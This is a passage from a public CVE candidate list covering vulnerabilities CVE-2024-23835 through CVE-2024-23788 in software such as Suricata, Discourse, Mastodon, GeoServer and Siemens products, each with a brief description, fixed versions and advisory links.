MISC:https://github.com/OISF/suricata/commit/97953998d2d60673ed6c30ddfb6a2d59b4230f97   |   URL:https://github.com/OISF/suricata/commit/97953998d2d60673ed6c30ddfb6a2d59b4230f97   |   MISC:https://github.com/OISF/suricata/commit/b1549e930f6426eeff43f12b672337cbcda566b8   |   URL:https://github.com/OISF/suricata/commit/b1549e930f6426eeff43f12b672337cbcda566b8   |   MISC:https://github.com/OISF/suricata/commit/cd035d59e3df157b606f4fe67324ea8e437be786   |   URL:https://github.com/OISF/suricata/commit/cd035d59e3df157b606f4fe67324ea8e437be786   |   MISC:https://github.com/OISF/suricata/commit/ce9b90326949c94a46611d6394e28600ee5e8bd5   |   URL:https://github.com/OISF/suricata/commit/ce9b90326949c94a46611d6394e28600ee5e8bd5   |   MISC:https://github.com/OISF/suricata/commit/e7e28822f473320658d6125f16ac3f0524baff01   |   URL:https://github.com/OISF/suricata/commit/e7e28822f473320658d6125f16ac3f0524baff01   |   MISC:https://github.com/OISF/suricata/commit/f9de1cca6182e571f1c02387dca6e695e55608af   |   URL:https://github.com/OISF/suricata/commit/f9de1cca6182e571f1c02387dca6e695e55608af   |   MISC:https://github.com/OISF/suricata/security/advisories/GHSA-q33q-45cr-3cpc   |   URL:https://github.com/OISF/suricata/security/advisories/GHSA-q33q-45cr-3cpc   |   MISC:https://redmine.openinfosecfoundation.org/issues/6531   |   URL:https://redmine.openinfosecfoundation.org/issues/6531   |   MISC:https://redmine.openinfosecfoundation.org/issues/6532   |   URL:https://redmine.openinfosecfoundation.org/issues/6532   |   MISC:https://redmine.openinfosecfoundation.org/issues/6540   |   URL:https://redmine.openinfosecfoundation.org/issues/6540   |   MISC:https://redmine.openinfosecfoundation.org/issues/6658   |   URL:https://redmine.openinfosecfoundation.org/issues/6658   |   MISC:https://redmine.openinfosecfoundation.org/issues/6659   |   URL:https://redmine.openinfosecfoundation.org/issues/6659   |   MISC:https://redmine.openinfosecfoundation.org/issues/6660   |   URL:https://redmine.openinfosecfoundation.org/issues/6660    Assigned (20240122)
CVE    2024    23835    Candidate    Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to version 7.0.3, excessive memory use during pgsql parsing could lead to OOM-related crashes. This vulnerability is patched in 7.0.3. As a workaround, users can disable the pgsql app layer parser.    FEDORA:FEDORA-2024-7b063bce0a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/   |   FEDORA:FEDORA-2024-bd4eed8466   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/   |   MISC:https://github.com/OISF/suricata/commit/86de7cffa7e8f06fe9d600127e7dabe89c7e81dd   |   URL:https://github.com/OISF/suricata/commit/86de7cffa7e8f06fe9d600127e7dabe89c7e81dd   |   MISC:https://github.com/OISF/suricata/commit/f52c033e566beafb4480c139eb18662a2870464f   |   URL:https://github.com/OISF/suricata/commit/f52c033e566beafb4480c139eb18662a2870464f   |   MISC:https://github.com/OISF/suricata/security/advisories/GHSA-8583-353f-mvwc   |   URL:https://github.com/OISF/suricata/security/advisories/GHSA-8583-353f-mvwc   |   MISC:https://redmine.openinfosecfoundation.org/issues/6411   |   URL:https://redmine.openinfosecfoundation.org/issues/6411    Assigned (20240122)
CVE    2024    23834    Candidate    Discourse is an open-source discussion platform. Improperly sanitized user input could lead to an XSS vulnerability in some situations. This vulnerability only affects Discourse instances which have disabled the default Content Security Policy. The vulnerability is patched in 3.1.5 and 3.2.0.beta5. As a workaround, ensure Content Security Policy is enabled and does not include `unsafe-inline`.    MISC:https://github.com/discourse/discourse/commit/568d704a94c528b7c2cb0f3512a7b7b606bc3000   |   URL:https://github.com/discourse/discourse/commit/568d704a94c528b7c2cb0f3512a7b7b606bc3000   |   MISC:https://github.com/discourse/discourse/security/advisories/GHSA-rj3g-8q6p-63pc   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-rj3g-8q6p-63pc   |   MISC:https://meta.discourse.org/t/3-1-5-security-and-bug-fix-release/293094   |   URL:https://meta.discourse.org/t/3-1-5-security-and-bug-fix-release/293094   |   MISC:https://meta.discourse.org/t/3-2-0-beta5-add-groups-to-dms-mobile-chat-footer-redesign-passkeys-enabled-by-default-and-more/293093   |   URL:https://meta.discourse.org/t/3-2-0-beta5-add-groups-to-dms-mobile-chat-footer-redesign-passkeys-enabled-by-default-and-more/293093    Assigned (20240122)
CVE    2024    23833    Candidate    OpenRefine is a free, open source power tool for working with messy data and improving it. A JDBC attack vulnerability exists in OpenRefine (version <= 3.7.7) where an attacker may construct a JDBC query which may read files on the host filesystem. Due to the newer MySQL driver library in the latest version of OpenRefine (8.0.30), there is no associated deserialization utilization point, so original code execution cannot be achieved, but attackers can use this vulnerability to read sensitive files on the target server. This issue has been addressed in version 3.7.8. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/OpenRefine/OpenRefine/commit/41ccf574847d856e22488a7c0987ad8efa12a84a   |   URL:https://github.com/OpenRefine/OpenRefine/commit/41ccf574847d856e22488a7c0987ad8efa12a84a   |   MISC:https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-6p92-qfqf-qwx4   |   URL:https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-6p92-qfqf-qwx4    Assigned (20240122)
CVE    2024    23832    Candidate    Mastodon is a free, open-source social network server based on ActivityPub Mastodon allows configuration of LDAP for authentication. Due to insufficient origin validation in all Mastodon, attackers can impersonate and take over any remote account. Every Mastodon version prior to 3.5.17 is vulnerable, as well as 4.0.x versions prior to 4.0.13, 4.1.x version prior to 4.1.13, and 4.2.x versions prior to 4.2.5.    MISC:https://github.com/mastodon/mastodon/commit/1726085db5cd73dd30953da858f9887bcc90b958   |   URL:https://github.com/mastodon/mastodon/commit/1726085db5cd73dd30953da858f9887bcc90b958   |   MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-3fjr-858r-92rw   |   URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-3fjr-858r-92rw   |   MLIST:[oss-security] 20240202 CVE-2024-23832: Mastodon: Remote user impersonation and takeover   |   URL:http://www.openwall.com/lists/oss-security/2024/02/02/4    Assigned (20240122)
CVE    2024    23831    Candidate    LedgerSMB is a free web-based double-entry accounting system. When a LedgerSMB database administrator has an active session in /setup.pl, an attacker can trick the admin into clicking on a link which automatically submits a request to setup.pl without the admin's consent. This request can be used to create a new user account with full application (/login.pl) privileges, leading to privilege escalation. The vulnerability is patched in versions 1.10.30 and 1.11.9.    MISC:https://github.com/ledgersmb/LedgerSMB/commit/8c2ae5be68a782d62cb9c0e17c0127bf30ef4165   |   URL:https://github.com/ledgersmb/LedgerSMB/commit/8c2ae5be68a782d62cb9c0e17c0127bf30ef4165   |   MISC:https://github.com/ledgersmb/LedgerSMB/security/advisories/GHSA-98ff-f638-qxjm   |   URL:https://github.com/ledgersmb/LedgerSMB/security/advisories/GHSA-98ff-f638-qxjm    Assigned (20240122)
CVE    2024    23830    Candidate    MantisBT is an open source issue tracker. Prior to version 2.26.1, an unauthenticated attacker who knows a user's email address and username can hijack the user's account by poisoning the link in the password reset notification message. A patch is available in version 2.26.1. As a workaround, define `$g_path` as appropriate in `config_inc.php`.    MISC:https://github.com/mantisbt/mantisbt/commit/7055731d09ff12b2781410a372f790172e279744   |   URL:https://github.com/mantisbt/mantisbt/commit/7055731d09ff12b2781410a372f790172e279744   |   MISC:https://github.com/mantisbt/mantisbt/security/advisories/GHSA-mcqj-7p29-9528   |   URL:https://github.com/mantisbt/mantisbt/security/advisories/GHSA-mcqj-7p29-9528   |   MISC:https://mantisbt.org/bugs/view.php?id=19381   |   URL:https://mantisbt.org/bugs/view.php?id=19381    Assigned (20240122)
CVE    2024    23829    Candidate    aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Security-sensitive parts of the Python HTTP parser retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input. Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling. The unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities. This vulnerability exists due to an incomplete fix for CVE-2023-47627. Version 3.9.2 fixes this vulnerability.    FEDORA:FEDORA-2024-0ddda4c691   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/   |   FEDORA:FEDORA-2024-f249b74f03   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/   |   MISC:https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827   |   URL:https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827   |   MISC:https://github.com/aio-libs/aiohttp/pull/8074   |   URL:https://github.com/aio-libs/aiohttp/pull/8074   |   MISC:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2   |   URL:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2    Assigned (20240122)
CVE    2024    23828    Candidate    Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to an authenticated arbitrary command execution via CRLF attack when changing the value of test_config_cmd or start_cmd. This vulnerability exists due to an incomplete fix for CVE-2024-22197 and CVE-2024-22198. This vulnerability has been patched in version 2.0.0.beta.12.    MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8   |   URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8    Assigned (20240122)
CVE    2024    23827    Candidate    Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check whether the provided user input is a certificate/key and allows writing to arbitrary paths in the system. It's possible to leverage the vulnerability into remote code execution by overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue.    MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m   |   URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m    Assigned (20240122)
CVE    2024    23826    Candidate    spbu_se_site is the website of the Department of System Programming of St. Petersburg State University. Before 2024.01.29, when uploading an avatar image, an authenticated user may intentionally use a large Unicode filename which would lead to a server-side denial of service under Windows. This is due to no limitation of the length of the filename and the costly use of the Unicode normalization with the form NFKD on Windows OS. This vulnerability was fixed in the 2024.01.29 release.    MISC:https://github.com/spbu-se/spbu_se_site/commit/5ad623eb0405260763046343c5785bc588d8a57d   |   URL:https://github.com/spbu-se/spbu_se_site/commit/5ad623eb0405260763046343c5785bc588d8a57d   |   MISC:https://github.com/spbu-se/spbu_se_site/security/advisories/GHSA-5vfc-v7hg-pvwm   |   URL:https://github.com/spbu-se/spbu_se_site/security/advisories/GHSA-5vfc-v7hg-pvwm    Assigned (20240122)
CVE    2024    23825    Candidate    TablePress is a table plugin for WordPress. For importing tables, TablePress makes external HTTP requests based on a URL that is provided by the user. That user input is filtered insufficiently, which makes it possible to send requests to unintended network locations and receive responses. On sites in a cloud environment like AWS, an attacker can potentially make GET requests to the instance's metadata REST API. If the instance's configuration is insecure, this can lead to the exposure of internal data, including credentials. This vulnerability is fixed in 2.2.5.    MISC:https://github.com/TablePress/TablePress/commit/62aab50e7a9c486caaeff26dff4dc01e059ecb91   |   URL:https://github.com/TablePress/TablePress/commit/62aab50e7a9c486caaeff26dff4dc01e059ecb91   |   MISC:https://github.com/TablePress/TablePress/security/advisories/GHSA-x8rf-c8x6-mrpg   |   URL:https://github.com/TablePress/TablePress/security/advisories/GHSA-x8rf-c8x6-mrpg    Assigned (20240122)
CVE    2024    23824    Candidate    mailcow is a dockerized email package, with multiple containers linked in one bridged network. The application is vulnerable to a pixel flood attack: once the payload has been successfully uploaded in the logo, the application slows down and the admin page stops responding. It was tested on versions 2023-12a and prior and is patched in version 2024-01.    MISC:https://github.com/0xbunniee/MailCow-Pixel-Flood-Attack   |   URL:https://github.com/0xbunniee/MailCow-Pixel-Flood-Attack   |   MISC:https://github.com/mailcow/mailcow-dockerized/commit/7f6f7e0e9ff608618e5b144bcf18d279610aa3ed   |   URL:https://github.com/mailcow/mailcow-dockerized/commit/7f6f7e0e9ff608618e5b144bcf18d279610aa3ed   |   MISC:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-45rv-3c5p-w4h7   |   URL:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-45rv-3c5p-w4h7    Assigned (20240122)
CVE    2024    23823    Candidate    vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation. The vantage6 server has no restrictions on CORS settings. It should be possible for people to set the allowed origins of the server. The impact is limited because v6 does not use session cookies. This issue has been addressed in commit `70bb4e1d8` and is expected to ship in subsequent releases. Users are advised to upgrade as soon as a new release is available. There are no known workarounds for this vulnerability.    MISC:https://github.com/vantage6/vantage6/commit/70bb4e1d889230a841eb364d6c03accd7dd01a41   |   URL:https://github.com/vantage6/vantage6/commit/70bb4e1d889230a841eb364d6c03accd7dd01a41   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-4946-85pr-fvxh   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-4946-85pr-fvxh    Assigned (20240122)
CVE    2024    23822    Candidate    Thruk is a multibackend monitoring webinterface. Prior to 3.12, the Thruk web monitoring application presents a vulnerability in a file upload form that allows a threat actor to arbitrarily upload files to the server to any path they desire and have permissions for. This vulnerability is known as Path Traversal or Directory Traversal. Version 3.12 fixes the issue.    MISC:https://github.com/sni/Thruk/commit/1aa9597cdf2722a69651124f68cbb449be12cc39   |   URL:https://github.com/sni/Thruk/commit/1aa9597cdf2722a69651124f68cbb449be12cc39   |   MISC:https://github.com/sni/Thruk/security/advisories/GHSA-4mrh-mx7x-rqjx   |   URL:https://github.com/sni/Thruk/security/advisories/GHSA-4mrh-mx7x-rqjx    Assigned (20240122)
CVE    2024    23821    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue.    MISC:https://github.com/GeoWebCache/geowebcache/issues/1171   |   URL:https://github.com/GeoWebCache/geowebcache/issues/1171   |   MISC:https://github.com/GeoWebCache/geowebcache/pull/1173   |   URL:https://github.com/GeoWebCache/geowebcache/pull/1173   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9    Assigned (20240122)
CVE    2024    23820    Candidate    OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue.    MISC:https://github.com/openfga/openfga/commit/908ac85c8b7769c8042cca31886df8db01976c39   |   URL:https://github.com/openfga/openfga/commit/908ac85c8b7769c8042cca31886df8db01976c39   |   MISC:https://github.com/openfga/openfga/releases/tag/v1.4.3   |   URL:https://github.com/openfga/openfga/releases/tag/v1.4.3   |   MISC:https://github.com/openfga/openfga/security/advisories/GHSA-rxpw-85vw-fx87   |   URL:https://github.com/openfga/openfga/security/advisories/GHSA-rxpw-85vw-fx87    Assigned (20240122)
CVE    2024    23819    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the MapML HTML Page. The MapML extension must be installed and access to the MapML HTML Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue.    MISC:https://github.com/geoserver/geoserver/commit/6f04adbdc6c289f5cb815b1462a6bd790e3fb6ef   |   URL:https://github.com/geoserver/geoserver/commit/6f04adbdc6c289f5cb815b1462a6bd790e3fb6ef   |   MISC:https://github.com/geoserver/geoserver/commit/df65ff05250cbb498c78af906d66e0c084ace8a1   |   URL:https://github.com/geoserver/geoserver/commit/df65ff05250cbb498c78af906d66e0c084ace8a1   |   MISC:https://github.com/geoserver/geoserver/pull/7175   |   URL:https://github.com/geoserver/geoserver/pull/7175   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-7x76-57fr-m5r5   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-7x76-57fr-m5r5   |   MISC:https://osgeo-org.atlassian.net/browse/GEOS-11154   |   URL:https://osgeo-org.atlassian.net/browse/GEOS-11154    Assigned (20240122)
CVE    2024    23818    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.3 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap OpenLayers Output Format. Access to the WMS OpenLayers Format is available to all users by default although data and service security may limit users' ability to trigger the XSS. Versions 2.23.3 and 2.24.1 contain a patch for this issue.    MISC:https://github.com/geoserver/geoserver/commit/4557a832eed19ec18b9753cb97e8aa85269741d2   |   URL:https://github.com/geoserver/geoserver/commit/4557a832eed19ec18b9753cb97e8aa85269741d2   |   MISC:https://github.com/geoserver/geoserver/commit/a26c32a469ee4c599236380452ffb4260361bd6f   |   URL:https://github.com/geoserver/geoserver/commit/a26c32a469ee4c599236380452ffb4260361bd6f   |   MISC:https://github.com/geoserver/geoserver/pull/7174   |   URL:https://github.com/geoserver/geoserver/pull/7174   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-fcpm-hchj-mh72   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-fcpm-hchj-mh72   |   MISC:https://osgeo-org.atlassian.net/browse/GEOS-11153   |   URL:https://osgeo-org.atlassian.net/browse/GEOS-11153    Assigned (20240122)
CVE    2024    23817    Candidate    Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application's response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML.    MISC:https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-7947-48q7-cp5m   |   URL:https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-7947-48q7-cp5m    Assigned (20240122)
CVE    2024    23816    Candidate    A vulnerability has been identified in Location Intelligence Perpetual Large (9DE5110-8CA13-1AX0) (All versions < V4.3), Location Intelligence Perpetual Medium (9DE5110-8CA12-1AX0) (All versions < V4.3), Location Intelligence Perpetual Non-Prod (9DE5110-8CA10-1AX0) (All versions < V4.3), Location Intelligence Perpetual Small (9DE5110-8CA11-1AX0) (All versions < V4.3), Location Intelligence SUS Large (9DE5110-8CA13-1BX0) (All versions < V4.3), Location Intelligence SUS Medium (9DE5110-8CA12-1BX0) (All versions < V4.3), Location Intelligence SUS Non-Prod (9DE5110-8CA10-1BX0) (All versions < V4.3), Location Intelligence SUS Small (9DE5110-8CA11-1BX0) (All versions < V4.3). Affected products use a hard-coded secret value for the computation of a Keyed-Hash Message Authentication Code. This could allow an unauthenticated remote attacker to gain full administrative access to the application.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-580228.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-580228.html    Assigned (20240122)
CVE    2024    23813    Candidate    A vulnerability has been identified in Polarion ALM (All versions). The REST API endpoints of doorsconnector of the affected product lack proper authentication. An unauthenticated attacker could access the endpoints, and potentially execute code.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-871717.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-871717.html    Assigned (20240122)
CVE    2024    23812    Candidate    A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP1). The affected application incorrectly neutralizes special elements when creating a report which could lead to command injection.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-943925.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-943925.html    Assigned (20240122)
CVE    2024    23811    Candidate    A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP1). The affected application allows users to upload arbitrary files via TFTP. This could allow an attacker to upload malicious firmware images or other files, that could potentially lead to remote code execution.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-943925.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-943925.html    Assigned (20240122)
CVE    2024    23810    Candidate    A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP1). The affected application is vulnerable to SQL injection. This could allow an unauthenticated remote attacker to execute arbitrary SQL queries on the server database.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-943925.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-943925.html    Assigned (20240122)
CVE    2024    23809    Candidate    A double-free vulnerability exists in the BrainVision ASCII Header Parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .vdhr file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1919   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1919    Assigned (20240122)
CVE    2024    23807    Candidate    The Apache Xerces C++ XML parser on versions 3.0.0 before 3.2.5 contains a use-after-free error triggered during the scanning of external DTDs. Users are recommended to upgrade to version 3.2.5 which fixes the issue, or mitigate the issue by disabling DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable. This issue has been disclosed before as CVE-2018-1311, but unfortunately that advisory incorrectly stated the issue would be fixed in version 3.2.3 or 3.2.4.    MISC:https://github.com/apache/xerces-c/pull/54   |   URL:https://github.com/apache/xerces-c/pull/54   |   MISC:https://lists.apache.org/thread/c497tgn864tsbm8w0bo3f0d81s07zk9r   |   URL:https://lists.apache.org/thread/c497tgn864tsbm8w0bo3f0d81s07zk9r    Assigned (20240122)
CVE    2024    23806    Candidate    Sensitive data can be extracted from HID iCLASS SE reader configuration cards. This could include credential and device administrator keys.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02   |   MISC:https://www.hidglobal.com/support   |   URL:https://www.hidglobal.com/support    Assigned (20240125)
CVE    2024    23805    Candidate    Undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. For the Application Visibility and Reporting module, this may occur when the HTTP Analytics profile with URLs enabled under Collected Entities is configured on a virtual server and the DB variables avr.IncludeServerInURI or avr.CollectOnlyHostnameFromURI are enabled. For BIG-IP Advanced WAF and ASM, this may occur when either a DoS or Bot Defense profile is configured on a virtual server and the DB variables avr.IncludeServerInURI or avr.CollectOnlyHostnameFromURI are enabled. Note: The DB variables avr.IncludeServerInURI and avr.CollectOnlyHostnameFromURI are not enabled by default. For more information about the HTTP Analytics profile and the Collect URLs setting, refer to K30875743: Create a new Analytics profile and attach it to your virtual servers https://my.f5.com/manage/s/article/K30875743 . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137334   |   URL:https://my.f5.com/manage/s/article/K000137334    Assigned (20240201)
CVE    2024    23804    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected applications contain a stack overflow vulnerability while parsing specially crafted PSOBJ files. This could allow an attacker to execute code in the context of the current process.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23803    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions), Tecnomatix Plant Simulation V2302 (All versions < V2302.0007). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted SPP file. This could allow an attacker to execute code in the context of the current process.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23802    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted SPP files. This could allow an attacker to execute code in the context of the current process.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23801    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions), Tecnomatix Plant Simulation V2302 (All versions < V2302.0007). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted SPP files. An attacker could leverage this vulnerability to crash the application causing denial of service condition.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23798    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected applications contain a stack overflow vulnerability while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23796    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23795    Candidate    A vulnerability has been identified in Tecnomatix Plant Simulation V2201 (All versions < V2201.0012), Tecnomatix Plant Simulation V2302 (All versions < V2302.0006). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-017796.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-017796.html    Assigned (20240122)
CVE    2024    23792    Candidate    When adding attachments to ticket comments, another user can add attachments as well, impersonating the original user. The attack requires a logged-in other user to know the UUID. While the legitimate user completes the comment, the malicious user can add more files to the comment. This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1.    MISC:https://otrs.com/release-notes/otrs-security-advisory-2024-03/   |   URL:https://otrs.com/release-notes/otrs-security-advisory-2024-03/    Assigned (20240122)
CVE    2024    23791    Candidate    Insertion of debug information into log file during building the elastic search index allows reading of sensitive information from articles. This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1.    MISC:https://otrs.com/release-notes/otrs-security-advisory-2024-02/   |   URL:https://otrs.com/release-notes/otrs-security-advisory-2024-02/    Assigned (20240122)
CVE    2024    23790    Candidate    Improper Input Validation vulnerability in the upload functionality for user avatars allows functionality misuse due to missing check of filetypes. This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023 through 2023.1.1.    MISC:https://otrs.com/release-notes/otrs-security-advisory-2024-01/   |   URL:https://otrs.com/release-notes/otrs-security-advisory-2024-01/    Assigned (20240122)
CVE    2024    23789    Candidate    Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary OS command on the affected product.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
CVE    2024    23788    Candidate    Server-side request forgery vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to send an arbitrary HTTP request (GET) from the affected product.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
